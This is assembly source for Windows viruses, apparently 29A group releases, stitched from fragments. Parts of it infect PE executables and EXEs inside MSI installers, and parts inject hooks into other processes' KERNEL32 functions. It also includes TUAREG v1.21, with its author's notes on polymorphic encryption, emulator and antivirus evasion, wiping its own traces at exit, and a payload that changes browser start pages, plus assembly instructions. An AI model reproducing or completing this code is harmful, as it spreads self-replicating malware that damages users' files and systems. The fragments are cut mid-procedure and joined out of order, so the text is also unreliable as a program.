jmp start_parse ;and parse again
end_parse:
sub esi,[ebp + k32_base - gdelta] ;correct to size and save it
mov [ebp + k32_size - gdelta],esi ;(size=k32_end - k32_start)
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push esi
push 0
call [ebp + a_VirtualAlloc - gdelta] ;allocate enough space
test eax,eax ;for K32 in our process
je end_K32_patching
xchg eax,edi
mov [ebp + k32_copy - gdelta],edi ;save the address
push PAGE_EXECUTE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virus_size
push 0 ;allocate enough space
push ebx ;for virus code in
call [ebp + a_VirtualAllocEx - gdelta] ;victim process
test eax,eax
je end_K32_dealloc ;quit if error
mov [ebp + virus_base - gdelta],eax ;save the address
push crcResCount
pop ecx ;count of APIz to hook
make_res:
pushad ;store all registers
mov eax,edi
lea esi,[ebp + crcRes - gdelta + (ecx*4)-4] ;get API
call get_api ;get address of API
test eax,eax
je end_res ;quit if error
push eax
mov edx,[ebp + posRes - gdelta + (ecx*4)-4] ;get ptr to variable which
sub eax,[ebp + k32_copy - gdelta] ;holds the address to old
add eax,[ebp + k32_base - gdelta] ;API
mov [edx],eax ;store address there
pop eax ;get address to EAX
push eax
sub eax,[ebp + k32_copy - gdelta] ;calculate api_hooker address
add eax,[ebp + k32_base - gdelta] ;...
mov esi,eax ;...
mov eax,0 ;base address of virus
virus_base = dword ptr $-4 ;in memory
add eax,[ebp + newRes - gdelta + (ecx*4)-4] ;add address of api_hooker
sub eax,5 ;substract the size of JMP
sub eax,esi ;substract with dest_address
pop esi
mov byte ptr [esi],0E9h ;write JMP opcode
mov [esi+1],eax ;write JMP address
end_K32_dealloc:
push MEM_DECOMMIT
push dword ptr [ebp + k32_size - gdelta]
push 12345678h
k32_copy = dword ptr $-4
call [ebp + a_VirtualFree - gdelta] ;now we have to decommit
;our memory
push MEM_RELEASE
push 0
push dword ptr [ebp + k32_copy - gdelta]
call [ebp + a_VirtualFree - gdelta] ;and de-reserve, now our
;buffer doesnt exist
end_K32_patching:
push ebx
call [ebp + a_CloseHandle - gdelta] ;close the handle of process
jmp pid_loop ;and look for another one
searchThread EndP
mov esi,[esp.cPushad+16]
push esi
push dword ptr [esp.cPushad+16]
call edi ;call API
inc eax
je end_ffa
dec eax
call CheckInfect ;no error, try to infect found file
end_ffa:mov [esp.Pushad_eax+8],eax
pop edi
pop esi
movsd ;write back <JMP newFindFirstFileA>
movsb
popad ;restore all registers
ret 8 ;and quit with 2 params on the stack
newFindFirstFileA EndP
;this procedure is used by API hookerz - it can create WFD structure and call
;CheckInfect procedure (this proc needs WFD struct)
xCheckInfect Proc
call $+5
xdelta: pop ebp ;get delta offset
lea esi,[ebp + WFD - xdelta]
push esi ;WFD struct
push dword ptr [esp.cPushad+16] ;ptr to filename
call [ebp + a_FindFirstFileA - xdelta] ;find file
inc eax
je end_xci ;quit if error
dec eax
call CheckInfect ;infect file
push eax
call [ebp + a_FindClose - xdelta] ;close search handle
end_xci:ret ;and quit
xCheckInfect EndP
xchg eax,ebx
push MAX_PATH
lea esi,[ebp + reg_buffer - igd]
push esi
push 0 ;get path+filename of current process
call [ebp + a_GetModuleFileNameA - igd]
@pushsz 'FtpPutFileA'
push eax ;get address of FtpPutFileA API
call [ebp + a_GetProcAddress - igd]
xchg eax,ecx
jecxz endICA ;quit if error
unload_lib:
push edi
call [ebp + a_FreeLibrary - gd]
@pushsz 'SfcIsFileProtected'
push edi
call [ebp + a_GetProcAddress - gd]
test eax,eax ;get the pointer to API
je un_sfc
push FILE_ATTRIBUTE_NORMAL
push ebx
call [ebp + a_SetFileAttributesA - gd]
dec eax ;blank file attributes
jne end_seh
mov ebx,[esi.WFD_nFileSizeLow]
add ebx,virus_size ;new file size to EBX
mov [ebp + mapped_file_size - gd],ebx
cdq
push edx
push ebx
push edx
push PAGE_READWRITE
push edx
push eax
call [ebp + a_CreateFileMappingA - gd]
xchg eax,ecx ;create file mapping object
jecxz end_cfile ;quit if error
mov [ebp + hMapFile - gd],ecx
;save handle
push ebx
push 0
push 0
push FILE_MAP_WRITE
push ecx
call [ebp + a_MapViewOfFile - gd]
xchg eax,ecx ;map view of file to our address space
jecxz end_mfile ;quit if error
mov [ebp + lpFile - gd],ecx ;save handle
jmp n_open ;and continue
end_file:
popad
push 12345678h
lpFile = dword ptr $-4 ;unmap view of file
call [ebp + a_UnmapViewOfFile - gd]
end_mfile:
push 12345678h
hMapFile = dword ptr $-4 ;close file mapping object
call [ebp + a_CloseHandle - gd]
end_cfile:
mov ecx,12345678h ;infection succeed?
cut_or_not = dword ptr $-4
jecxz no_cut ;yeah, dont truncate file
close_file:
push 12345678h
hFile = dword ptr $-4 ;close file
call [ebp + a_CloseHandle - gd]
end_attr:
lea eax,[esi.WFD_szFileName]
push [esi.WFD_dwFileAttributes]
push eax ;set back file attributes
call [ebp + a_SetFileAttributesA - gd]
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad ;restore all registers
ret ;and quit from procedure
;this procedure will try to NTFS-compress infected file and add new stream
ntfs_stuff Proc
push 0
lea eax,[ebp + tmp - gd]
push eax
push 0
push 0
push 4
call in_buf
dd 1 ;default compression
in_buf: push 09C040h ;compress code
push dword ptr [ebp + hFile - gd]
call [ebp + a_DeviceIoControl - gd] ;compress infected file!
push 0
lea eax,[ebp + tmp - gd]
push eax
push szMsg-1-p_msg
lea eax,[ebp + p_msg - gd]
push eax
push ebx
call [ebp + a_WriteFile - gd] ;copy message to new stream
push ebx
call [ebp + a_CloseHandle - gd] ;close stream
jmp close_file ;and close whole file
ntfs_stuff EndP
check_msi:
cmp [ecx],0E011CFD0h ;is it MSI signature?
jne end_file ;no, quit
cmp [ecx+4],0E11AB1A1h ;is it MSI signature?
jne end_file ;no, quit
parse_msi:
call mz_search ;search for EXE file inside MSI
test ecx,ecx
je end_file ;no files found, quit...
mov ebx,ecx
add ebx,[ecx.MZ_lfanew]
got_epo:mov eax,[edi.SH_VirtualAddress]
add eax,[edi.SH_SizeOfRawData] ;calculate RVA of virus begining
mov ecx,esi
sub ecx,[esp.Pushad_ecx]
sub ecx,[edx.SH_PointerToRawData]
add ecx,[edx.SH_VirtualAddress] ;calculate RVA of JMP opcode
or dword ptr [edx.SH_Characteristics],IMAGE_SCN_MEM_WRITE
;set WRITE flag to .CODE section
mov edi,esi
mov esi,ecx
sub esi,5
sub edi,5
add esi,[ebx.NT_OptionalHeader.OH_ImageBase]
mov ebx,12345678h
enc_key = dword ptr $-4
mov [ebp + decr_key - gd],ebx ;save encryption key
and dword ptr [ebp + enc_key - gd],0;nulify encryption key variable
mov ecx,8192
mov esi,[ebp + file_buffer - gd]
rep movsb ;and last 8192 of host code
@pushsz 'Imagehlp'
@imghlp:call [ebp + a_LoadLibraryA - gd]
test eax,eax ;load IMAGEHLP.DLL
je no_csum ;quit if error
xchg eax,edi
@pushsz 'CheckSumMappedFile'
push edi
call [ebp + a_GetProcAddress - gd]
test eax,eax ;get address of CheckSumMappedFile API
je un_csum ;quit if error
lea ecx,[ebx.NT_OptionalHeader.OH_CheckSum]
push ecx ;where to store new checksum
call $+9
dd ? ;old checksum
push 12345678h ;size of infected file
mapped_file_size = dword ptr $-4
push dword ptr [ebp + lpFile - gd]
call eax ;calculate new checksum
push edi
mov edi,[edx+ebx+IMAGE_SIZEOF_FILE_HEADER+4]
cmp edi,'xet.' ;is the first section ".text"?
je cc_msi
cmp edi,'EDOC' ;or ".CODE"?
je cc_msi
pop edi ;no, quit
ret
cc_msi: pop edi
mov ecx,[ebx.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov eax,ecx
sub eax,[ebx+edx+SH_VirtualAddress+IMAGE_SIZEOF_FILE_HEADER+4]
;get entrypoint RVA to EAX
push eax
mov eax,ecx
mov [ebp + msi_entrypoint - gd],eax ;save old entrypoint
mov eax,[ebx.NT_OptionalHeader.OH_ImageBase]
add [ebp + msi_entrypoint - gd],eax ;in RAW format
pop eax
push esi
sub esi,edi
sub esi,eax ;set new entrypoint
add [ebx.NT_OptionalHeader.OH_AddressOfEntryPoint],esi
pop edi
no_cave_found:
popad ;no cave inside EXE file found,
ret ;restore all registers and quit
CheckInfect EndP
;this procedure can allocate memory (8192 bytes)
mem_alloc:
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push 8192
push 0
call [ebp + a_VirtualAlloc - gd]
ret
push MEM_RELEASE
push 0
push esi
call [ebp + a_VirtualFree - gd]
ret
;this procedure can create file mapping object - used in non-resident mode
;input: EAX - opened handle of file
Create_FileMappingA Proc
cdq
push edx
push edx
push edx
push PAGE_READWRITE
push edx
push eax
call [ebp + a_CreateFileMappingA - gdelta]
ret
Create_FileMappingA EndP
push 10
pop ecx
g_str: xor edx,edx
div ecx
add edx,'0'
xchg eax,edx
stosb
xchg eax,edx
test eax,eax
jne g_str
pop esi
xchg esi,edi
dec esi
cpy_num:std
lodsb
cld
stosb
cmp al,11h
jne cpy_num
dec edi
xor al,al
stosb
pop esi
ret
Num2Ascii EndP
;this is MSI loader - virus places this procedure into EXE files inside MSIs
msi_start Proc
pushad
call mdelta
mdelta: pop ebp ;get delta offset
call get_base ;get base of K32
test eax,eax
je end_msi
push eax
call crc32m1
dd 04134D1ADh ;LoadLibraryA
dd 0AFDF191Fh ;FreeLibrary
dd 0FFC97C1Fh ;GetProcAddress
crc32m1:pop esi
call get_api ;get addresses of these APIs
xchg eax,ecx
pop eax
test ecx,ecx
je end_msi
push eax
add esi,4
call get_api ;...
xchg eax,edi
test edi,edi
pop eax
je end_msi
add esi,4
push eax
call get_api ;...
xchg eax,edx
test edx,edx
pop eax
je end_msi
push edx
@pushsz 'USER32'
call ecx ;load USER32.DLL library
xchg eax,esi
test esi,esi
pop edx
je end_msi
@pushsz 'MessageBoxA'
push esi
call edx ;get address of MessageBoxA API
xchg eax,ecx
test ecx,ecx
je freelib
push 1000h
@pushsz '[Win32.HiV] by Benny/29A'
szTitle:call szMsg
p_msg: db 'This cell has been infected by HIV virus, generation: '
gcount: db '0000000000',0
szMsg: push 0
call ecx ;show lame message :)
freelib:push esi
call edi ;unload USER32.DLL
end_msi:popad
mov eax,offset ExitProcess
msi_entrypoint = dword ptr $-4
jmp eax ;and quit to host
;CRC32s of APIz
crc32s: dd 0DCF6E06Ch ;GetEnvironmentVariableA
dd 033D350C4h ;OpenProcess
dd 068624A9Dh ;CloseHandle
dd 019F33607h ;CreateThread
dd 079C3D4BBh ;VirtualProtect
dd 0FFC97C1Fh ;GetProcAddress
dd 04A27089Fh ;ReadProcessMemory
dd 00E9BBAD5h ;WriteProcessMemory
dd 056E1B657h ;VirtualProtectEx
dd 0D4AFA114h ;VirtualQueryEx
dd 04402890Eh ;VirtualAlloc
dd 02AAD1211h ;VirtualFree
dd 0DA89FC22h ;VirtualAllocEx
dd 03C19E536h ;SetFileAttributesA
dd 08C892DDFh ;CreateFileA
dd 096B2D96Ch ;CreateFileMappingA
dd 0797B49ECh ;MapViewOfFile
dd 094524B42h ;UnmapViewOfFile
dd 085859D42h ;SetFilePointer
dd 059994ED6h ;SetEndOfFile
dd 04B2A3E7Dh ;SetFileTime
dd 0CC09D51Eh ;DeviceIoControl
dd 0AE17EBEFh ;FindFirstFileA
dd 0AA700106h ;FindNextFileA
dd 0C200BE21h ;FindClose
dd 04134D1ADh ;LoadLibraryA
dd 0AFDF191Fh ;FreeLibrary
dd 021777793h ;WriteFile
dd 0DE256FDEh ;DeleteFileA
dd 004DCF392h ;GetModuleFileNameA
dd 082B618D4h ;GetModuleHandleA
dd 052E3BEB1h ;IsDebuggerPresent
dd 0EF7D811Bh ;GetFileSize
dd 054D8615Ah ;ReadFile
crc32c = ($-crc32s)/4 ;number of APIz
db 11h
end_virus: ;end of virus in file
dec_buff db 10 dup (?)
align 4
a_apis: ;addresses of APIs
a_GetEnvironmentVariableA dd ?
a_OpenProcess dd ?
a_CloseHandle dd ?
a_CreateThread dd ?
a_VirtualProtect dd ?
a_GetProcAddress dd ?
a_ReadProcessMemory dd ?
a_WriteProcessMemory dd ?
a_VirtualProtectEx dd ?
a_VirtualQueryEx dd ?
a_VirtualAlloc dd ?
a_VirtualFree dd ?
a_VirtualAllocEx dd ?
a_SetFileAttributesA dd ?
a_CreateFileA dd ?
a_CreateFileMappingA dd ?
a_MapViewOfFile dd ?
a_UnmapViewOfFile dd ?
a_SetFilePointer dd ?
a_SetEndOfFile dd ?
a_SetFileTime dd ?
a_DeviceIoControl dd ?
a_FindFirstFileA dd ?
a_FindNextFileA dd ?
a_FindClose dd ?
a_LoadLibraryA dd ?
a_FreeLibrary dd ?
a_WriteFile dd ?
a_DeleteFileA dd ?
a_GetModuleFileNameA dd ?
a_GetModuleHandleA dd ?
a_IsDebuggerPresent dd ?
a_GetFileSize dd ?
a_ReadFile dd ?
mbi: dd ? ;MEMORY_BASIC_INFORMATION
dd
? ;structure needed by
dd
? ;VirtualQueryEx API
reg_size dd ? ;number of pages with same rights*size of one page
reg_state dd ? ;state of page(s)
dd ?
dd ?
mbi_size = dword ptr $-mbi
CSE: pushad
lodsb ; AL = byte within search area
reset_cavity_loop:
xchg eax,ebx ; BL = " " " "
xor edx,edx ; Zero EDX
dec ecx ; Decrease counter
jecxz no_cave_found ; Zero ECX? Jump to no_cave_found
find_cave_loop:
lodsb ; AL = byte within search area
cmp al,bl ; Current byte equal to previous byte?
jne reset_cavity_loop ; Not equal? Jump to reset_cavity_loop
inc edx ; Increase number of bytes found in
; cave
cmp edx,msi_end-msi_start ; Found a cave large enough?
jne find_cave_loop ; Not equal? Jump to find_cave_loop
sub esi,msi_end-msi_start ; ESI = pointer to cave
mov [esp.Pushad_esi],esi
popad
;-----------------------------------------------------------------------------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CSE.INC]ÄÄÄ
;;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;;ßßÛßßß Û ÛßßÛ ÛßÛÜ Ûßßß Ûßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
;;Þ Û Û Û Û Û Û ÜÛ Û Û ÄÄÄÄÄÄÄÄÄ Designed to carry the ÄÄÄÄÄ Ý Þ ÜÝ ÞßÝÜÝ
;;Þ Û Û Û ÛßßÛ ÛßÛÜ Ûßß Û ßÛ ÄÄÄ TUAREG polymorphing engine ÄÄÄ Þ Ý Ý ÜÝ Ý
;;Þ Û ÛÜÜÛ Û Û Û Û ÛÜÜÜ ÛÜÜÛ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Û ÝÜÞÜÜ Ý
;;Þ ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
;;Þ
;;ÞÝ ßßÛßß ÛÛ ÞÛ ÛÜÜ Ý ÞÛßÝ Þ Ý Û ÞßßÝ ÞßßÛ ÞßßÝ
;;ÞÝ ÛÞ ÛÞ ÝÛ ÞÝ Ý ÞÝ ÞÝ ßÞ Ý ÞÝ Û Û Û Þ Û Û
;;ÞßÝÝ Ý ÝÞßÛÞÛÝ Ý Û ÝÞÛÝÛßÛÞ ßßÝÝ Þ Þ ÛßÞÞ ÝÞÛÝÞÛß Û Þ ßßÛ ÛßßÛ
;;ÞÜÝÛÜÝ ÝÞ ÞÞÜÜ Ý ÝÞÜÜÞ ÞÞ ÛÛÝÛ ÞÜÜÝ Ý ÞÞÝÛÞÜÜÞ ÞÝ ÜÛÛÜÜ ÜÜÛÞÝ ÞÝ
;;ÄÄÄÄÄÝÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;; ßß
;; This virus is designed to carry the Tameless Unpredictable Anarchic Relent-
;; less Encryption Generator (TUAREG), so I decided to name the virus as the
;; engine. Apart from generating extremely polymorphic samples, the virus does
;; other things apart from carrying the engine.
;;
;; This is the version 1.21. The version 1.0 was sent to AVers before the re-
;; lease of this version in 29A#5, so I have had time to improve some things,
;; correct some bugs and make new features, like more complex garbage on de-
;; cryptors, the routine for zeroing the memory before terminate the program,
;; etc. The version 1.1 was sent too, but too late I realized of a "bug" in
;; the infection procedure (but NOT in the TUAREG) that made some programs to
;; refuse execution, so I corrected some lines of code, added some others, im-
;; proved the TUAREG engine greatly (now it's v1.01) and I call from all that
;; I got "TUAREG v1.21".
;;
;; In this version:
;; Virus total binary size: 20994 bytes
;; Infection virtual and physical size: 65536 bytes
;; Binary size of TUAREG: 12951 bytes (only main engine)
;; Average size of a generated decryptor: 9.26 Kb
;;
;; Technical notes:
;;------------------
;; - It infects all *.EXEs, *.SRCs and *.CPLs on current, windows and
;; windows\system directories, and the programs set for execution at
;; windows startup.
;;
;; - It's also a per-process resident, patching the next functions:
;; GetProcAddress, CreateFileA, CreateProcessA, FindFirstFileA,
;; FindNextFileA, GetFileAttributesA, SetFileAttributesA, GetFullPathNameA,
;; MoveFileA, CopyFileA, DeleteFileA, WinExec, _lopen, MoveFileExA and
;; OpenFile. ExitProcess is also patched, but for special actions.
;;
;; - The RVAs of the functions are obtained scanning the export directory
;; of KERNEL32, doing a checksum of the name of every function and compa-
;; ring it with the stored checksums on the virus. When someone coincides,
;; then the corresponding RVA is set on the virus' calling address.
;;
;; - On infection, it'll place the generated decryptors on .text section,
;; and the .reloc section will be anulated, renamed and overwritten with
;; the encrypted data and the overwritten code of .text. If it's not big
;; enough, its size will be increased until all the stuff fit in it. If
;; there isn't any .reloc section, then a new section with a random name
;; will be added (if there is enough space in the EXE header).
;;
;; - Then, the infection mark will be: if there's a .reloc section, the
;; file isn't infected, and neither if the .rsrc section is the last. If
;; .rsrc section isn't the last section of all, the file won't be infected,
;; since it could be already. I know it isn't the best system, but I was
;; tired of coding :). In the future I'll do a less noticeable infection.
;;
;; - The virus is polymorphic, using the TUAREG. Moreover, a little also
;; polymorphic decryptor (to avoid cryptanalisis) has been put. It's not as
;; polymorphic as TUAREG generated ones (well, compared to the TUAREG gene-
;; rated decryptors, the little one shouldn't be called "a decryptor" :),
;; but well...
;;
;; Notes about the TUAREG
;;--------------------------
;; TUAREG has been a neverending project practically since I entered in the
;; viruscene. My initial releases didn't resemble in any way with the result
;; (this one), but in spite of this fact, I'm thousands of times more proud
;; of this result than ever, since I didn't expected such a complexity after
;; a so easy coding of it (well, not sooooo easy, but it was not like coding
;; the MeDriPolEn, where there were things that I didn't know what they do,
;; although they functioned well :), but I knew every moment what was expected
;; for every portion of code).
;; After correcting some little bugs (and not so little, but dark ones), I
;; got very surprised with the result. Oh, errmh... if I explain first what
;; the engine does, maybe the explanations will be easier :). So let's see:
;;
;; - The TUAREG is based in two main techniques that I explain in the article
;; called "Advanced decryptor construction", which are PRIDE and Branching.
;; PRIDE (Pseudo-Random Index DEcryption) avoids linear decryption, seeming
;; a normal access of an application over its data, and Branching avoids the
;; linear execution of a decryption loop, since it can execute sixteen types
;; of different code that performs exactly the same action, so there isn't
;; any manner of knowing the behaviour of the engine (which path is going
;; to take everytime) without emulation.
;;
;; - To perform the Branching, the entire engine has been oriented to execute
;; in nearly absolute recursivity, simplifying alot many actions, and taking
;; advance of this to create very structured portions of code that could be
;; on any program. Not in vane, the size of the decryptors overpasses 8 Kb of
;; pure code in the majority of times.
;;
;; - The phylosophy of this engine is completely different from the
;; MeDriPolEn. Since I based that one on simulate a corrupted file, this time
;; I simulate a normal application. Every branch has this "format":
;;
;; ------*-------*-------*--------xxxxxxxxxxxxx--<>------() -----|----|---|
;; Legend:
;; -- : Garbage
;; * : Random conditional jump to another branch
;; x : Decryption code (mixed with garbage)
;; <> : Check of end-of-decryption. If it isn't, it performs a random jump
;; to any * on any branch
;; () : Code to jump to the decrypted part, and the code of this branch ends.
;; ----| : Subroutines that are created while coding this branch. The addres-
;; ses of that subroutines are stored into an array which allows to
;; other branches to do calls to that subroutines apart from their own
;; ones.
;; This type of code is repeated several times and it's randomized alot.
;;
;; - The garbage is quite complex to give up the less advanced emulators. The
;; generator can do CALLs with stack entries and stack frames (emulation of
;; this), nested CALLs, conditional jumps with non-zero displacement, memory
;; read/writes (performed to .bss when this section exists in the infected
;; file), 8 and 32 bit common types (some 16 bit ones are avoided on purpo-
;; se, due to some emulators that take them as suspicious on a Win32 app.),
;; random short loops between code, relative jump to the decrypted code (re-
;; quires execution/emulation for a correct running of it), calls to impor-
;; ted KERNEL32 functions (it was hard to make it!), etc. etc. etc., and I
;; don't use any one-byte usual garbage on poly engines (those CLCs, CMCs,
;; STIs, etc. are highly suspicious for an emulator, so I didn't put anyone
;; of them, except on the little second decryptor, which is under the main
;; encryption layer).
;;
;; - Before entering to the TUAREG engine, the virus scans the victim's body
;; to determine the future virtual address of the import table and the vir-
;; tual addresses of the import table fields, and it fills the fields in the
;; APIInfo blocks to know which address it has to use to make a calling to
;; that KERNEL32 function. Once made, the virus will call any of the "con-
;; trolled" APIs that were also in the import table. I think it's the first
;; virus (November 2000) that makes API callings in the decryptor :). The
;; called APIs are ordered in frequency of apparition in an application, and
;; with a little algorithm we make the first ones to be selected more often
;; than the next ones (in descendent order).
;;
;; - Some other internal features that "beautifies" the code.
;;
;; More about the virus itself
;;-------------------------------
;; - Since it's a v1.21, it was code over the version 1.0 (of course), so if
;; some code isn't commented is because I was lazy to do it :), and many
;; things are changed from v1.0 (bugs corrected, some things improved, etc.)
;;
;; - The KERNEL32 address is found using the address pushed onto the stack
;; from the beginning. It's easy, it doesn't generate errors (since most
;; Microsoft C compiled programs use the fact that that address exists),
;; and it's compatible with all versions of Win32 (I think). Anyway, the
;; virus uses SEH. If any exception occurs while any operation, the virus
;; will restore the old SEH and execute the host.
;;
;; - After finding the RVAs of the API functions, it performs a runtime in-
;; fection.
;;
;; - After that, the virus patches the import table of the file and set its
;; per-process part.
;;
;; - If the API functions couldn't be obtained, the virus will exit. Other-
;; wise, if WriteProcessMemory nor GetCurrentProcess RVAs aren't obtained,
;; it will simulate an error of execution, since it can't restore the host.
;;
;; - Before returning to the host, it'll try to patch all the ocurrences of
;; ExitProcess in the host and make them to point to the routine prepared
;; on this virus to hold it (that's what I call "Pseudo-EPO" :). When the
;; application calls to ExitProcess, the virus takes control, and since the
;; program is "under the user's view" terminated, we can perform intensive
;; virus activity, as a background action. What we do here is to infect all
;; programs, not only one of each four, with runtime infection, and then we
;; overwrite all the virus code with zeroes to avoid AVers to have a clean
;; copy of the virus in memory when executing on a simulated environment and
;; waiting for the end of running.
;;
;; - In this version, the virus is very stable, and an average user won't
;; notice the presence of the virus by errors in the system, since even the
;; TUAREG (the most complex code I ever make) hasn't any errors now (from
;; what I know), nor the infection system.
;;
;; Payload
;;-----------
;; On the first and third friday of every month, the start pages on the two
;; most used navigators (Internet Explorer and Netscape Communicator) will be
;; set to http://www.thehungersite.com, which it's a web that donates food to
;; hungry countries bought with the money that they earn when you visit the
;; banners. The virus sets this using the ADVAPI32.DLL registry functions.
;;
;; With this, I could say that maybe it's the first payload in the viruses'
;; history that performs something useful and maybe changes some minds about
;; the state of our world. Hey, and you can do it too! Enter in that URL
;; (http://www.thehungersite.com) and press "Donate food". It's easy, free and
;; can save lives!
;;
;; About this, I saw some time ago in alt.comp.virus (Usenet) a discussion
;; about this virus. A guy asked if this virus can be called a good virus or
;; what (due to the payload), and it generates a good discussion about the
;; ethicals of virus writing to make this type of things. Well, I did it be-
;; cause I wanted to make a payload that make something more than fuck the
;; user. And it's far from my intention to difamate the URL I redirect naviga-
;; tors to, but it's the most famous and most trustable donation service that
;; I saw over the internet, and moreover this page has links to other free do-
;; nation services. I don't care about that ones that think its start page is
;; "holy" and nobody must touch it (the ones that think that their own home
;; comfort is above anyone's life - get a life!), but I care about the ones
;; that think the action is good but the way is bad (a virus). My apologizes,
;; but you have to think that a virus is a piece of code, not a fragment of
;; The Apocalypse :).
;;
;; My thanks to:
;;---------------
;;
;; The whole 29A - members and ex-members, because it's the Dream Team of
;; the vx!
;; All ppl who innove and create in this scene, and don't destruct the work
;; of anyone (I HATE destructive payloads! :)
;; To you, for reading this
;; To assemble this:
;; TASM32 /m29A /ml tuareg.asm
;; TLINK32 -aa -Tpe -x tuareg.obj,,,import32.lib
;; PEWRSEC tuareg.exe
.386p
.model flat
locals
.data
;; Message on first generation
Titulo db 'Virus TUAREG v1.21 1st Generation by The Mental Driller/29A',0
Mensaje db 'You have been infected with the first generation',0dh,0ah
db 'of the virus TUAREG by The Mental Driller/29A',0
.code
extrn ExitProcess:PROC ; For the fake host
extrn MessageBoxA:PROC
TuaregMain proc
Inic_Virus label dword
;; This decryptor will be generated later. It's a full polymorphic one, al-
;; though very simple, to avoid cryptanalisys. The structure is as follows:
;;
;; MOV Reg,InicDecryptVirus
;; MOV Reg2,Virus_Size / 4
;; MOV Reg3,CryptKey
;; Loop:
;; XOR/ADD/SUB [Reg],Reg3
;; ADD Reg,4
;; ADD/SUB/XOR/ROL1 Reg3,Modifier
;; DEC Reg2
;; JNZ Loop
;;
;; The MOVs can be MOVs, LEAs or pairs PUSH/POP, and it can use DEC or SUB,1
;; or ADD,-1 , randomly selected. Well, quite better than v1.0 (which was a
;; fixed decryptor where I changed values).
db 3Ch dup (90h)
InicDecryptVirus:
cld ; Restore possible STD
push eax
call GetDeltaOffset
GetDeltaOffset: pop ebp
sub ebp, offset GetDeltaOffset
mov [ebp+DeltaOffset2], ebp ; This is needed!
mov [ebp+DeltaOffset3], ebp
mov [ebp+DeltaOffset4], ebp
mov [ebp+DeltaOffset5], ebp
db 0Fh, 31h ; rdtsc ; Get CPU timestamp
mov [ebp+DwordAleatorio1], eax ; Set EAX (low timestamp)
; on random seed
;; Put the return address
mov eax, [ebp+InicIP]
mov [esp], eax
mov eax, [ebp+RestoreAddress]
mov [ebp+RestoreAddress2], eax
mov eax, [ebp+SizeOfText]
mov [ebp+SizeOfText2], eax
mov eax, [ebp+ImageBase]
mov [ebp+ImageBase2], eax
;; SEH frame
lea eax, [ebp+@@JumpToHost]
push eax
push dword ptr fs:[0]
mov fs:[0], esp
mov [ebp+LastStack], esp ; For SEH returning
;; This code, in fact, will jump to the host execution, since it's set as our
;; SEH manager. So, a jump here will execute host. Quite anti-debugger :)
@@GenerateException:
xor ebx, ebx
dec ebx
mov [ebx], cl
@@MaybeKernelFound:
mov ebx, [eax+3Ch] ; Get PE address
add ebx, eax
cmp word ptr [ebx], 'EP' ; Is it a PE header?
jnz @@Loop_001 ; If not, continue searching
;; SEH handler. This is the SEH that we put. If any exception happens, this
;; will take control and it'll restore and execute directly the host.
@@JumpToHost: db 0BDh
DeltaOffset3 dd 0 ; This is MOV EBP,DeltaOffset
mov esp, [ebp+LastStack] ; Recover ESP
pop dword ptr fs:[0] ; Restore SEH
pop eax ; Release our handle from stack
; This has been changed since the binary release. I noticed it had
; a bug, so I corrected it. The binary that the AVers have differs
; a little from this.
@@SimulateExecError:
push 00BFF700h ; Construct NOP/MOV BYTE PTR [BFF70000],0
push 0005C690h ; in the stack frame to generate an excep-
jmp esp ; tion from an "unknown module" :)
; module" :)
TuaregMain endp
AuxCounter dd 0
LastStack dd 0
InfectAllFiles db 0
;; Now the ident message. Never showed, but it'll help the AVers to name this
;; virus ;)
Ident_Virus db 0,0,'[Virus TUAREG v1.21 by The Mental Driller/29A]',0
db '- This virus has been designed for carrying '
db 'the TUAREG engine -',0,0
;; This functions scans for any ocurrence of ExitProcess in the .text section
;; and substitutes the address in the call for an address here. Once here, we
;; move a little program to the stack frame and then we jump there. That pro-
;; gram will overwrite the virus code with zeroes. This feature can fuck some
;; AVers programs that get a decrypted copy of the virus executing the infec-
;; ted program and waiting for finish.
ModifyExitProcess proc
cmp dword ptr [ebp+ExitProcessInImport], 0
jz @@Return ; If ExitProcess doesn't exist in the
; import directory, finish
lea ebx, [ebp+AddressToLastFunc] ;Get the address to over-
lea eax, [ebp+LastFunction] ; write ExitProcess callings
mov [ebx], eax ; with, pointing to our routi-
; ne
mov [ebp+AddressToAddressToLastFunc], ebx
mov esi, [ebp+RestoreAddress2] ; beginning of .text
mov ecx, [ebp+SizeOfText2] ; Quantity of code to scan
sub ecx, 6 ; Last 5 bytes can't contain a call, and maybe
; we generate an exception if we overpass .text
; size
@@Loop_001: lea edi, [ebp+CallToSearch] ; Address to constructed call
mov edx, 6 ; Size of call
@@Loop_002: cmpsb ; Test byte
jnz @@NextByte ; If it isn't equal, jump
@@Loop_003: dec edx ; Decrease call-size counter
jz @@Found ; If 0, we've found a call to ExitProcess
cmp edx, 5 ; Call-size counter=5?
jnz @@Next_001 ; If not, check normally
dec ecx ; Decrease .text-size counter
jz @@Return ; If it's 0, return
inc esi ; Increase checking indexes
inc edi ; ...And now check two possible opcodes:
cmp byte ptr [esi-1], 15h ; CALL [Address]
jz @@Loop_003 ; If it is, continue checking
cmp byte ptr [esi-1], 25h ; JMP [Address]
jnz @@NextByte ; If it isn't, "restart" call string
